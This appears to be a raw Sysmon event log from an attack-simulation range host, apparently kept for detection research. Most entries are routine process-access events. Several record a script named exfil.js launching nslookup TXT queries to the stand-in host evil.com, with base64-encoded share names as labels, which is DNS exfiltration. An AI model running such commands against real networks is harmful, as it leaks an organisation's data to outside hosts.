14:21:25.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.150{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A842-000000005F02}6092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.150{2E1864BB-18E5-629A-A642-000000005F02}77686148C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-A842-000000005F02}6092C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.154{2E1864BB-18E5-629A-A842-000000005F02}6092C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-A642-000000005F02}7768C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlriox.tmp 2>&1 10341000x8000000000000000206492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.118{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-A742-000000005F02}7556C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.118{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-A742-000000005F02}7556C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.103{2E1864BB-18E5-629A-A742-000000005F02}75566848C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-A642-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.103{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A742-000000005F02}7556C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A642-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-18E0-629A-6742-000000005F02}39764632C:\Windows\System32\WScript.exe{2E1864BB-18E5-629A-A642-000000005F02}7768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.098{2E1864BB-18E5-629A-A642-000000005F02}7768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlriox.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.087{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlotm.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.065{2E1864BB-18E5-629A-A442-000000005F02}41763548C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-A542-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.050{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.050{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A542-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.050{2E1864BB-18E5-629A-A342-000000005F02}16925192C:\Windows\system32\cmd.exe{2E1864BB-18E5-629A-A542-000000005F02}5060C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.062{2E1864BB-18E5-629A-A542-000000005F02}5060C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E5-629A-A342-000000005F02}1692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlotm.tmp 2>&1 10341000x8000000000000000206472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.034{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-A442-000000005F02}4176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.034{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E5-629A-A442-000000005F02}4176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.034{2E1864BB-18E5-629A-A442-000000005F02}41763548C:\Windows\system32\conhost.exe{2E1864BB-18E5-629A-A342-000000005F02}1692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E5-629A-A442-000000005F02}4176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 